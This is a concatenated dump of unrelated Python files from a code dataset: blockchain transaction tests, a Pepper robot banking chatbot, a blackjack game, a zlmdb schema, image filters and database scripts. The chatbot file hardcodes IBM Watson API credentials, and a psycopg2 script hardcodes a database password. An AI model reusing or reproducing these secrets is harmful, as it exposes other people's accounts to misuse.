\"abcd\"\n # assert signed hash has changed\n assert tx.hash() != tx_signed_hash\n # assert unsigned hash has not changed\n assert tx.unsigned_hash() == tx_unsigned_hash\n\n\ndef test_tx_from_json():\n \"\"\"test serialization and deserialization\"\"\"\n sender = \"abcd\"\n receivers = [\"fe\"]\n amounts = [1]\n fee = 100\n t1 = Transaction(sender, receivers, amounts, fee)\n t2 = transaction.from_json(t1.string())\n assert t1.string() == t2.string()\n assert t1.hash() == t2.hash()\n assert t1.unsigned_hash() == t2.unsigned_hash()\n\n\ndef test_verify_tx():\n \"\"\"\n tests if a signed transaction can be validated\n we just need the address for this, because address=public_key\n \"\"\"\n w = wallet.generate_new_wallet()\n sender = w.get_address()\n receivers = [\"fe\"]\n amounts = [1]\n fee = 100\n t = Transaction(sender, receivers, amounts, fee)\n w.sign_transaction(t)\n assert cryptoutil.verify_transaction_sig(t, t.get_signature())\n assert t.verify()\n\n\ndef test_unvalid_verify_tx():\n sender = \"a\"\n receivers = [\"fe\"]\n amounts = [1]\n fee = 100\n t = Transaction(sender, receivers, amounts, fee)\n assert False == t.verify()\n","sub_path":"neutro/test/chain/test_transaction.py","file_name":"test_transaction.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"505870479","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\nimport time\nimport sys\nimport qi\nfrom requests.exceptions import ConnectionError\nimport json\nimport requests\nimport HTMLParser\nimport random\n\nclass Banque(object):\n def __init__(self):\n\n self.appli = qi.Application(sys.argv)\n self.appli.start()\n self.session = self.appli.session\n\n self.logger = qi.Logger(\"Banque\")\n\n self.ALTabletService = self.session.service(\"ALTabletService\")\n self.tts = self.session.service('ALTextToSpeech')\n self.mem = self.session.service(\"ALMemory\")\n\n self.ALTabletService.resetTablet()\n self.mem.insertData('Banque/onStart', 0)\n\n def speak(self, clientId, toSpeak):\n self.mem.raiseEvent('Banque/tts', toSpeak)\n self.write_logchat('Bot', toSpeak)\n self.tts.say(toSpeak)\n global_var = (item for item in self.global_vars if item[\"clientId\"] == str(clientId)).next()\n global_var['tts'] = toSpeak\n try:\n self.logger.info(\"Robot: \" + toSpeak)\n except UnicodeEncodeError as e:\n self.logger.info(e)\n\n def listen(self, clientId):\n startListening = 1\n self.mem.insertData('Banque/startListening', 1)\n while (startListening==1):\n startListening = self.mem.getData('Banque/startListening')\n time.sleep(0.2)\n pass\n\n stt = self.mem.getData('Banque/stt')\n stt = stt.replace(\" ' \", \"'\")\n self.write_logchat('Human', stt)\n global_var = (item for item in self.global_vars if item[\"clientId\"] == str(clientId)).next()\n global_var['stt'] = stt\n self.logger.info(\"Human: \" + stt)\n self.mem.insertData('Banque/startListening', 1)\n return stt\n\n # def write_logchat(self, actor, text):\n # with open(self.log_filename, 'a') as f:\n # try:\n # text = text.encode('ascii', 'xmlcharrefreplace')\n # f.write(actor + '\\t: ' + text + '\\n')\n # except UnicodeDecodeError as e:\n # self.logger.info(\"Error in write_logchat\")\n # self.logger.error(e)\n\n def write_logchat(self, actor, text):\n try:\n with open(self.log_filename, 'a') as f:\n text = text.encode('ascii', 'xmlcharrefreplace')\n f.write(actor + '\\t: ' + text + '\\n')\n f.close()\n time.sleep(0.1)\n except UnicodeDecodeError as e:\n self.logger.info(\"Error in write_logchat\")\n self.logger.error(e)\n\n def quit(self):\n self.ALTabletService.resetTablet()\n self.logger.info('Reset Tablet')\n\n\n\n def callBanqueDialog(self, clientId):\n client_id = \"\"\n conversation_id = \"\"\n question = \"\"\n res = \"\"\n\n while ((res != 'END') and ('Au revoir' not in res)):\n url = 'https://gateway.watsonplatform.net/dialog/api/v1/dialogs/97111df6-fc4d-4714-b409-34f0c483f5f4/conversation?input='\n if ((client_id != \"\") or (conversation_id != \"\")):\n question = self.listen(clientId)\n url = url + question\n url = url + '&client_id=' + str(client_id)\n url = url + '&conversation_id=' + str(conversation_id)\n\n r = requests.post(url, auth=('d2b39394-6660-4948-a9ed-74a70883f784', '4LSJkrIBBupP'))\n client_id = json.loads(r.text)[\"client_id\"]\n conversation_id = json.loads(r.text)[\"conversation_id\"]\n\n if ((question != 'quitter') and (question != 'Quitter')):\n res = \" \".join(json.loads(r.text)[\"response\"])\n else:\n res = 'END'\n # self.logger.info(res)\n if (res != 'END'):\n self.speak(clientId, res)\n\n \"\"\"\n def send2BanqueNodeRed(self, clientId, value):\n host = \"https://banque-orange-node-red.mybluemix.net/pepper\"\n payload = {'text':value, 'id':int(clientId)}\n self.logger.info(\"Value to send to Watson: \" + value + \", id=\"+clientId)\n r = requests.get(host, params=payload)\n self.logger.info(\"Send to Watson OK\")\n\n hparser = HTMLParser.HTMLParser()\n res = hparser.unescape(r.text)\n self.logger.info(\"Receive from Watson OK\")\n if ((value=='Quitter') or (value=='quitter')):\n res = 'END'\n return res\n\n def getBankInfo(self, clientId):\n res = self.send2BanqueNodeRed(clientId, 'hello')\n self.speak(clientId, res)\n while ((res!='END') and ('Au revoir' not in res)):\n question = self.listen(clientId)\n question = question.replace(\" ' \", \"'\")\n self.logger.info('Question: ' + question)\n res = self.send2BanqueNodeRed(clientId, question)\n if ((res!='END') and ('502' not in res)):\n self.speak(clientId, res)\n elif ('502' in res):\n self.speak(clientId, \"Un erreur depuis le serveur du Watson s'est produit...\")\n elif (res=='END'):\n self.speak(clientId, \"Je quitte la banque...\")\n\n try:\n self.logger.info('Response: '+res)\n except UnicodeEncodeError as e:\n self.logger.error(e)\n \"\"\"\n\n \"\"\"\n ==============================================================================\n Main program body with decision and redirection\n ==============================================================================\n \"\"\"\n def runProgram(self, clientId):\n time.sleep(1)\n self.callBanqueDialog(clientId)\n self.quit_program(clientId)\n\n \"\"\"\n Quit program\n \"\"\"\n def quit_program(self, clientId):\n self.mem.raiseEvent('Banque/quit', 1)\n\n \"\"\"\n Initialisation for global variables used by clientId\n \"\"\"\n def global_var_init(self, clientId):\n self.global_vars.append (dict([\n ('clientId', str(clientId)),\n ('tts', ''),\n ('stt', ''),\n ]))\n \"\"\"\n Run\n \"\"\"\n def run(self):\n self.clientId = str(random.randint(1,1000000))\n self.log_filename = 'log_display/chat.log'\n self.global_vars = []\n self.global_var_init(self.clientId)\n\n # Initialisation chat.log for conversation display\n with open(self.log_filename, 'w') as f:\n f.write('')\n f.close()\n self.logger.info(\"Created \" + self.log_filename)\n\n # Wait for onStart (Pepper reaches human for conversation)\n onStart = self.mem.getData('Banque/onStart')\n self.logger.info('Banque/onStart: ' + str(onStart))\n while (onStart==0):\n onStart = self.mem.getData('Banque/onStart')\n time.sleep(0.2)\n pass\n\n self.logger.info('Banque/onStart: ' + str(onStart))\n self.runProgram(self.clientId)\n\napp = Banque()\napp.run()\napp.quit()\n\n# End of Program #\n","sub_path":"Banque.py","file_name":"Banque.py","file_ext":"py","file_size_in_byte":6985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"526996272","text":"#!/usr/bin/env python\nimport sys\nfrom nltk.util import clean_html\n\nif (len(sys.argv)) !=3:\n sys.stderr.write('Usage !\\n')\n sys.exit(1)\n\nhtml = ''\n\ninpFile = open(sys.argv[1], 'r');\noutFile = open(sys.argv[2], 'w');\n\nfor line in inpFile.readlines():\n html = html + line\n\noutFile.write(clean_html(html) + '\\n')\n","sub_path":"scripts/nltk_clean.py","file_name":"nltk_clean.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"391014668","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Sep 18 09:50:48 2021\r\n\r\n@author: 07062962468\r\n\"\"\"\r\n\r\nimport tkinter as tk\r\nimport random\r\n\r\ndef load_images(card_images):\r\n suits=['heart', 'club', 'diamond', 'spade']\r\n face_cards = ['jack', 'queen', 'king']\r\n \r\n extension = 'ppm'\r\n \r\n #for each suit, retrieve the image for the card\r\n for suit in suits:\r\n #first the number cards 1 - 10\r\n for card in range(1, 11):\r\n name = 'cards/{}_{}.{}'.format(str(card), suit, extension)\r\n image = tk.PhotoImage(file=name)\r\n card_images.append((card, image,))\r\n \r\n #the face cards\r\n for card in face_cards:\r\n name = 'cards/{}_{}.{}'.format(str(card), suit, extension)\r\n image = tk.PhotoImage(file=name)\r\n card_images.append((10, image,))\r\n\r\ndef deal_card(frame):\r\n #pop the next card off the deck\r\n next_card = deck.pop(0)\r\n deck.append(next_card)\r\n #add the image to a Label and Dislay the label\r\n tk.Label(frame, image=next_card[1], relief='raised' ).pack(side='left')\r\n #now return the card's face value\r\n return next_card\r\n\r\ndef score_hand(hand):\r\n #Calculate the total score of all cards in the list\r\n #Only one ace can have the value 11, and this will reduce to 1 if the hand would burst\r\n score = 0\r\n ace = False\r\n for next_card in hand:\r\n card_value = next_card[0]\r\n if card_value == 1 and not ace:\r\n ace = True\r\n card_value = 11\r\n score += card_value\r\n #if we would bust, check if there is an ace and subtract 10\r\n if score >21 and ace:\r\n score -= 10\r\n ace = False\r\n return score\r\n\r\ndef deal_dealer():\r\n dealer_score = score_hand(dealer_hand)\r\n while 0 < dealer_score < 17:\r\n dealer_hand.append(deal_card(dealer_card_frame))\r\n dealer_score = score_hand(dealer_hand)\r\n dealer_score_label.set(dealer_score)\r\n \r\n player_score = score_hand(player_hand)\r\n if player_score > 21:\r\n result_text.set('Dealer wins!')\r\n elif dealer_score > 21 or dealer_score < player_score:\r\n result_text.set('player wins!')\r\n elif dealer_score > player_score:\r\n result_text.set('Dealer wins!')\r\n else:\r\n result_text.set('Draw!')\r\n \r\n \r\ndef deal_player():\r\n player_hand.append(deal_card(player_card_frame))\r\n player_score = score_hand(player_hand)\r\n dealer_score = score_hand(dealer_hand)\r\n \r\n player_score_label.set(player_score)\r\n if player_score > 21:\r\n result_text.set('Dealer Wins!')\r\n elif dealer_score > 21 or dealer_score < player_score:\r\n result_text.set('player wins!')\r\n elif dealer_score > player_score:\r\n result_text.set('Dealer wins!')\r\n else:\r\n result_text.set('Draw!')\r\n\r\ndef restart_game():\r\n global dealer_hand\r\n global player_hand\r\n global dealer_card_frame\r\n global player_card_frame\r\n dealer_card_frame.destroy()\r\n player_card_frame.destroy()\r\n dealer_card_frame = tk.Frame(card_frame, background='green')\r\n dealer_card_frame.grid(row=0, column=1, sticky='ew', rowspan=2)\r\n player_card_frame = tk.Frame(card_frame, background='green')\r\n player_card_frame.grid(row=2, column=1, sticky='ew', rowspan=2)\r\n player_hand.clear()\r\n dealer_hand.clear()\r\n deal_player()\r\n dealer_hand.append(deal_card(dealer_card_frame))\r\n dealer_score_label.set(score_hand(dealer_hand))\r\n deal_player()\r\n random.shuffle(deck)\r\n\r\n \r\ndef end_game():\r\n mainwindow.destroy() \r\n\r\nmainwindow = tk.Tk()\r\nmainwindow.title('Black Jack')\r\nmainwindow.geometry('640x480')\r\nmainwindow.configure(background='green')\r\n\r\nresult_text = tk.StringVar()\r\nresult = tk.Label(mainwindow, textvariable=result_text)\r\nresult.grid(row=0, column=0, columnspan=3)\r\ncard_frame = tk.Frame(mainwindow, relief='sunken', borderwidth=1, background='green')\r\ncard_frame.grid(row=1, column=0, sticky='ew', columnspan=3, rowspan=2)\r\n\r\ndealer_score_label = tk.IntVar()\r\ntk.Label(card_frame, text='Dealer', background='green', fg='white').grid(row=0, column=0)\r\ntk.Label(card_frame, textvariable = dealer_score_label, background='green', fg='white').grid(row=1, column=0)\r\n\r\n#embedded frame to hold the card images\r\ndealer_card_frame = tk.Frame(card_frame, background='green')\r\ndealer_card_frame.grid(row=0, column=1, sticky='ew', rowspan=2)\r\n\r\nplayer_score_label = tk.IntVar()\r\n# player_score = 0\r\n# player_ace = False\r\n\r\ntk.Label(card_frame, text='Player', background='green', fg='white').grid(row=2, column=0)\r\ntk.Label(card_frame, textvariable=player_score_label, background='green', fg='white').grid(row=3, column=0)\r\n\r\n#embedded frame to hold the card images\r\nplayer_card_frame = tk.Frame(card_frame, background='green')\r\nplayer_card_frame.grid(row=2, column=1, sticky='ew', rowspan=2)\r\n\r\nbutton_frame = tk.Frame(mainwindow)\r\nbutton_frame.grid(row=3, column=0, columnspan=3, sticky='w')\r\n\r\ndealer_button = tk.Button(button_frame, text='Dealer', command=deal_dealer)\r\ndealer_button.grid(row=0, column=0)\r\n\r\nplayer_button = tk.Button(button_frame, text='Player', command=deal_player)\r\nplayer_button.grid(row=0, column=1)\r\n\r\nrestart_button = tk.Button(button_frame, text='Restart', command=restart_game)\r\nrestart_button.grid(row=0, column=2)\r\n\r\nend_button = tk.Button(button_frame, text='End Game', command=end_game)\r\nend_button.grid(row=0, column=3)\r\n\r\ncards = []\r\nload_images(cards)\r\n# print(cards)\r\n#Create a new deck of cards and shuffle them\r\ndeck = list(cards)\r\nrandom.shuffle(deck)\r\n\r\n#create list to stor dealer's and player's hands\r\ndealer_hand = []\r\nplayer_hand = []\r\n\r\ndeal_player()\r\ndealer_hand.append(deal_card(dealer_card_frame))\r\ndealer_score_label.set(score_hand(dealer_hand))\r\ndeal_player()\r\n\r\nmainwindow.mainloop()\r\n","sub_path":"blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"6060844","text":"import pandas as pd\n\ndef getSamePeaks(df, keycolumn):\n grouped = df.groupby(keycolumn)\n samePeakDfs = []\n for k,v in grouped.groups.iteritems():\n if len(v) > 1:\n samePeakDfs.append(grouped.get_group(k))\n return samePeakDfs\n\n","sub_path":"pymetrik.py","file_name":"pymetrik.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"525127750","text":"###############################################################################\n#\n# The MIT License (MIT)\n#\n# Copyright (c) typedef int GmbH\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n###############################################################################\n\nimport random\nimport uuid\nimport datetime\nfrom typing import Optional, List, Dict\n\nimport zlmdb\n\n\nclass User(object):\n oid: int\n name: str\n authid: str\n uuid: uuid.UUID\n email: str\n birthday: datetime.date\n is_friendly: bool\n tags: Optional[List[str]]\n ratings: Dict[str, float]\n friends: List[int]\n referred_by: int\n realm_oid: int\n icecream: str\n mrealm: uuid.UUID # type:ignore\n mrealm_notnull: uuid.UUID # type:ignore\n\n def __init__(self):\n self.oid = None\n self.name = None\n self.authid = None\n self.uuid = None\n self.email = None\n self.birthday = None\n self.is_friendly = None\n self.tags = None\n self.ratings = {}\n self.friends = []\n self.referred_by = None\n self.realm_oid = None\n self.icecream = None\n self.mrealm = None\n self.mrealm_notnull = None\n\n def __eq__(self, other):\n if not isinstance(other, self.__class__):\n return False\n if other.oid != self.oid:\n return False\n if other.name != self.name:\n return False\n if other.authid != self.authid:\n return False\n if other.uuid != self.uuid:\n return False\n if other.email != self.email:\n return False\n if other.birthday != self.birthday:\n return False\n if other.is_friendly != self.is_friendly:\n return False\n if (self.tags and not other.tags) or (not self.tags and other.tags):\n return False\n if other.realm_oid != self.realm_oid:\n return False\n if other.icecream != self.icecream:\n return False\n if other.mrealm != self.mrealm:\n return False\n if other.mrealm_notnull != self.mrealm_notnull:\n return False\n return True\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def marshal(self):\n obj = {\n 'oid': self.oid,\n 'name': self.name,\n 'authid': self.authid,\n 'uuid': self.uuid.hex if self.uuid else None,\n 'email': self.email,\n 'birthday': {\n 'year': self.birthday.year if self.birthday else None,\n 'month': self.birthday.month if self.birthday else None,\n 'day': self.birthday.day if self.birthday else None,\n },\n 'is_friendly': self.is_friendly,\n 'tags': self.tags,\n 'ratings': self.ratings,\n 'friends': self.friends,\n 'referred_by': self.referred_by,\n 'realm_oid': self.realm_oid,\n 'icecream': self.icecream,\n 'mrealm': self.mrealm.hex if self.mrealm else None,\n 'mrealm_notnull': self.mrealm_notnull.hex if self.mrealm_notnull else None,\n }\n return obj\n\n @staticmethod\n def parse(obj):\n user = User()\n user.oid = obj.get('oid', None)\n user.name = obj.get('name', None)\n user.authid = obj.get('authid', None)\n if 'uuid' in obj:\n user.uuid = uuid.UUID(hex=obj['uuid'])\n user.email = obj.get('email', None)\n if 'birthday' in obj:\n b = obj['birthday']\n user.birthday = datetime.date(b.year, b.month, b.day)\n user.is_friendly = obj.get('is_friendly', None)\n user.tags = obj.get('tags', None)\n user.ratings = obj.get('ratings', {})\n user.friends = obj.get('friends', [])\n user.referred_by = obj.get('referred_by', None)\n user.realm_oid = obj.get('realm_oid', None)\n user.icecream = obj.get('icecream', None)\n if 'mrealm' in obj and obj['mrealm']:\n user.mrealm = uuid.UUID(hex=obj['mrealm'])\n if 'mrealm_notnull' in obj and obj['mrealm_notnull']:\n user.mrealm_notnull = uuid.UUID(hex=obj['mrealm_notnull'])\n return user\n\n @staticmethod\n def create_test_user(oid=None, realm_oid=None):\n user = User()\n if oid is not None:\n user.oid = oid\n else:\n user.oid = random.randint(0, 9007199254740992)\n user.name = 'Test {}'.format(user.oid)\n user.authid = 'test-{}'.format(user.oid)\n user.uuid = uuid.uuid4()\n user.email = '{}@example.com'.format(user.authid)\n user.birthday = datetime.date(1950, 12, 24)\n user.is_friendly = True\n user.tags = ['geek', 'sudoko', 'yellow']\n for j in range(10):\n user.ratings['test-rating-{}'.format(j)] = 1 / (j + 1) # round(random.random(), 3)\n user.friends = [random.randint(0, 9007199254740992) for _ in range(10)]\n user.referred_by = random.randint(0, 9007199254740992)\n if realm_oid is not None:\n user.realm_oid = realm_oid\n else:\n user.realm_oid = random.randint(0, 9007199254740992)\n user.icecream = random.choice(['vanilla', 'lemon', 'strawberry'])\n user.mrealm = uuid.uuid4()\n user.mrealm_notnull = uuid.uuid4()\n return user\n\n\nclass Schema1(zlmdb.Schema):\n\n tab_uuid_str: zlmdb.MapUuidString\n tab_uuid_oid: zlmdb.MapUuidOid\n tab_uuid_uuid: zlmdb.MapUuidUuid\n tab_str_str: zlmdb.MapStringString\n tab_str_oid: zlmdb.MapStringOid\n tab_str_uuid: zlmdb.MapStringUuid\n tab_oid_str: zlmdb.MapOidString\n tab_oid_oid: zlmdb.MapOidOid\n tab_oid_uuid: zlmdb.MapOidUuid\n tab_uuid_json: zlmdb.MapUuidJson\n tab_uuid_cbor: zlmdb.MapUuidCbor\n tab_uuid_pickle: zlmdb.MapUuidPickle\n tab_str_json: zlmdb.MapStringJson\n tab_str_cbor: zlmdb.MapStringCbor\n tab_str_pickle: zlmdb.MapStringPickle\n tab_oid_json: zlmdb.MapOidJson\n tab_oid_cbor: zlmdb.MapOidCbor\n tab_oid_pickle: zlmdb.MapOidPickle\n\n def __init__(self):\n self.tab_uuid_str = zlmdb.MapUuidString(slot=1)\n self.tab_uuid_oid = zlmdb.MapUuidOid(slot=2)\n self.tab_uuid_uuid = zlmdb.MapUuidUuid(slot=3)\n self.tab_str_str = zlmdb.MapStringString(slot=4)\n self.tab_str_oid = zlmdb.MapStringOid(slot=5)\n self.tab_str_uuid = zlmdb.MapStringUuid(slot=6)\n self.tab_oid_str = zlmdb.MapOidString(slot=7)\n self.tab_oid_oid = zlmdb.MapOidOid(slot=8)\n self.tab_oid_uuid = zlmdb.MapOidUuid(slot=9)\n self.tab_uuid_json = zlmdb.MapUuidJson(slot=10, marshal=(lambda o: o.marshal()), unmarshal=User.parse)\n self.tab_uuid_cbor = zlmdb.MapUuidCbor(slot=11, marshal=(lambda o: o.marshal()), unmarshal=User.parse)\n self.tab_uuid_pickle = zlmdb.MapUuidPickle(slot=12)\n self.tab_str_json = zlmdb.MapStringJson(slot=20, marshal=(lambda o: o.marshal()), unmarshal=User.parse)\n self.tab_str_cbor = zlmdb.MapStringCbor(slot=21, marshal=(lambda o: o.marshal()), unmarshal=User.parse)\n self.tab_str_pickle = zlmdb.MapStringPickle(slot=22)\n self.tab_oid_json = zlmdb.MapOidJson(slot=30, marshal=(lambda o: o.marshal()), unmarshal=User.parse)\n self.tab_oid_cbor = zlmdb.MapOidCbor(slot=31, marshal=(lambda o: o.marshal()), unmarshal=User.parse)\n self.tab_oid_pickle = zlmdb.MapOidPickle(slot=32)\n\n\nclass Schema2(zlmdb.Schema):\n\n users: zlmdb.MapOidPickle\n\n def __init__(self):\n self.users = zlmdb.MapOidPickle(1)\n\n\nclass Schema3(zlmdb.Schema):\n\n users: zlmdb.MapStringPickle\n\n def __init__(self):\n self.users = zlmdb.MapStringPickle(1)\n\n\nclass Schema4(zlmdb.Schema):\n\n users: zlmdb.MapOidPickle\n\n idx_users_by_authid: zlmdb.MapStringOid\n\n idx_users_by_email: zlmdb.MapStringOid\n\n idx_users_by_realm: zlmdb.MapOidOidOid\n\n idx_users_by_icecream: zlmdb.MapStringOidOid\n\n idx_users_by_mrealm_authid: zlmdb.MapUuidStringOid\n\n idx_users_by_mrealm_authid_notnull: zlmdb.MapUuidStringOid\n\n def __init__(self):\n super(Schema4, self).__init__()\n\n self.users = zlmdb.MapOidPickle(1)\n\n self.idx_users_by_authid = zlmdb.MapStringOid(2)\n self.users.attach_index('idx1', self.idx_users_by_authid, lambda user: user.authid, nullable=False)\n\n self.idx_users_by_email = zlmdb.MapStringOid(3)\n self.users.attach_index('idx2', self.idx_users_by_email, lambda user: user.email, nullable=True)\n\n self.idx_users_by_realm = zlmdb.MapOidOidOid(4)\n self.users.attach_index('idx3',\n self.idx_users_by_realm,\n lambda user: (user.realm_oid, user.oid),\n nullable=False)\n\n self.idx_users_by_icecream = zlmdb.MapStringOidOid(5)\n self.users.attach_index('idx4',\n self.idx_users_by_icecream,\n lambda user: (user.icecream, user.oid),\n nullable=False)\n\n self.idx_users_by_mrealm_authid = zlmdb.MapUuidStringOid(6)\n self.users.attach_index('idx5',\n self.idx_users_by_mrealm_authid,\n lambda user: (user.mrealm, user.authid),\n nullable=True)\n\n self.idx_users_by_mrealm_notnull_authid = zlmdb.MapUuidStringOid(7)\n self.users.attach_index('idx6',\n self.idx_users_by_mrealm_notnull_authid,\n lambda user: (user.mrealm_notnull, user.authid),\n nullable=False)\n","sub_path":"zlmdb/tests/_schema_py3.py","file_name":"_schema_py3.py","file_ext":"py","file_size_in_byte":10632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"543217134","text":"\"\"\"Exemplo de aplicação de realces.\"\"\"\nfrom PIL import Image, ImageEnhance\n\nimage = Image.open('beijo_menor.jpg')\n\nsaturation = ImageEnhance.Color(image)\ncontrast = ImageEnhance.Contrast(image)\nbrightness = ImageEnhance.Brightness(image)\nsharpness = ImageEnhance.Sharpness(image)\n\n\ndef duno_filtro(img):\n contrast = ImageEnhance.Contrast(img)\n contrastado = contrast.enhance(1.1)\n\n brightness = ImageEnhance.Brightness(contrastado)\n brilho = brightness.enhance(1.1)\n\n saturation = ImageEnhance.Color(brilho)\n saturada = saturation.enhance(1.3)\n\n vinheta = Image.open('vinheta.png')\n saturada.paste(vinheta, (0, 0), vinheta)\n\n saturada.save('beijo_editada.jpg')\n\n\nduno_filtro(image)\n","sub_path":"codigo/Live176/exemplos_dos_slides/exemplo_12.py","file_name":"exemplo_12.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"635030765","text":"# -*- coding: utf-8 -*-\n\n\"\"\"setup.py: setuptools control.\"\"\"\n\nimport re\nfrom setuptools import setup\n\nversion = re.search(\n r'^__version__\\s*=\\s*\"(.*)\"',\n open('urigui/uricli.py').read(),\n re.M\n).group(1)\n\nwith open(\"README.md\", \"rb\") as f:\n long_descr = f.read().decode(\"utf-8\")\n\nsetup(\n name=\"urigui\",\n packages=[\"urigui\"],\n entry_points={\n \"console_scripts\": ['uri = urigui.uricli:main']\n },\n version=version,\n description=\"Utility CLI for submitting solutions to URI Online Judge.\",\n long_description=long_descr,\n long_description_content_type='text/markdown',\n author=\"Marcus Vinicius\",\n author_email=\"viniips@hotmail.com\",\n install_requires=[\n \"docopt==0.6.2\",\n \"PyInquirer==1.0.2\",\n \"requests==2.20.0\",\n \"mechanicalSoup==0.11.0\",\n \"demjson==2.2.4\",\n \"websocket-client==0.53.0\"\n ],\n url=\"https://github.com/vininjr/uricli\",\n license='Apache 2.0'\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"64557297","text":"\nimport psycopg2 as pg\nfrom tkinter import ttk\nimport pyexcel\nimport os\nimport pandas as pd\nfrom pandas._libs.tslibs import timedeltas\nimport matplotlib\nfrom matplotlib import *\nimport webbrowser\nimport matplotlib.pyplot as plt\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nimport datetime\nimport pandas as pd\nfrom tkinter import messagebox\n\n\ndbname = 'postgres'\nhost = 'localhost'\nuser = 'postgres'\npassword = 'ZpZh2rgH'\n\nconn = pg.connect(dbname=dbname, host=host, user=user, password=password) #рисоединение к базе данных\nquery = \"\"\"SELECT \"Property_Name\", \"Class\"\n FROM \"Market_Share\"\n WHERE \"Agency\"= 'Colliers' ;\"\"\"\nwith conn:\n cur = conn.cursor()\n cur.execute(query) # выполнение SQL запроса\n colnames = [column[0] for column in cur.description]\n rows1 = cur.fetchall() # чтение данных, полученных при запросе к базе\n #rows1.insert(0,colnames)\ndf = pd.DataFrame(rows1)\n#print(df)\n\nquery2 = \"\"\"SELECT \"Property_Name\", \"Class\"\n FROM \"Market_Share\"\n WHERE \"Owner\"= 'O1 Properties' ;\"\"\"\nwith conn:\n cur = conn.cursor()\n cur.execute(query2) # выполнение SQL запроса\n colnames = [column[0] for column in cur.description]\n rows2 = cur.fetchall() # чтение данных, полученных при запросе к базе\n#print(rows2)\n\n\nquery3 = \"\"\"SELECT \"Agency\", \"Class\", \"Property_Name\", \"SQM\"::real, \"Year\"\n FROM \"Market_Share\"\n WHERE \"SQM\" NOT LIKE '%w/s' AND \"SQM\" NOT LIKE '%offices' \"\"\" #\"SQM\" ~ E'^\\\\d+$' AND #AND \"SQM\"::numeric\n\n\nquery4 = \"\"\"SELECT \"Property_Name\", \"SQM\", \"Year\", \"Quarter\" \n FROM \"Market_Share\"\n WHERE \"SQM\" LIKE '%w/s'\"\"\"\nwith conn:\n cur = conn.cursor()\n cur.execute(query4) # выполнение SQL запроса\n colnames = [column[0] for column in cur.description]\n rows3 = cur.fetchall() # чтение данных, полученных при запросе к базе\n #rows3.insert(0,colnames)\n df3 = pd.DataFrame(rows3)\n df3.columns = [colnames]\n\nprint(df3)\n\n\n\n#query5 = \"\"\"SELECT \"Agency\",\"City\", \"Property_Name\", \"SQM\"::real, \"Year\", \"Quarter\"\n #FROM \"Market_Share\"\n #WHERE \"SQM\" NOT LIKE '%w/s' AND \"SQM\" NOT LIKE '%offices' AND \"Agency\" LIKE 'KF' AND \"City\" LIKE 'Moscow' AND \"SQM\" IN\n #(SELECT \"SQM\" FROM \"Market_Share\" GROUP BY \"SQM\" HAVING count(*)>0)\"\"\" #LIKE (SELECT `column` FROM `table` GROUP BY `column` HAVING count(*)>1);\n\n\n#with conn:\n #cur = conn.cursor()\n #cur.execute(query5) # выполнение SQL запроса\n #colnames = [column[0] for column in cur.description]\n #rows3 = cur.fetchall() # чтение данных, полученных при запросе к базе\n #rows3.insert(0,colnames)\n #df5 = pd.DataFrame(rows3)\n #df5.columns = [colnames]\n\n#print(df5)\n\n\ndf1 = pd.read_excel('C:\\\\Users\\\\Public\\\\Перспектиные города.xlsx')\ndf1.plot(x='SAL', y='Sec', style='o')\nplt.show()\n","sub_path":"testing sql.py","file_name":"testing sql.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"559927875","text":"#!/usr/bin/python\nimport json\nimport sys\n\ndef get_benchmarks(filename):\n return json.load(open(filename))['benchmarks']\n\ndef get_score(results, baseline):\n score = 0\n for result, reference in zip(results, baseline):\n score += float(reference['real_time']) / result['real_time']\n if result['real_time'] > 10000:\n sys.exit(1)\n score /= len(baseline)\n return score\n\nif __name__ == '__main__':\n print(get_score(get_benchmarks(sys.argv[1]), get_benchmarks(sys.argv[2])))\n","sub_path":"CPP/05-meet-in-the-middle/scorer.py","file_name":"scorer.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"349201602","text":"from __future__ import absolute_import\n\nfrom django.core import mail\nfrom celery import shared_task\nfrom radius.celery import app\nimport random\nfrom apps.accounts.models import 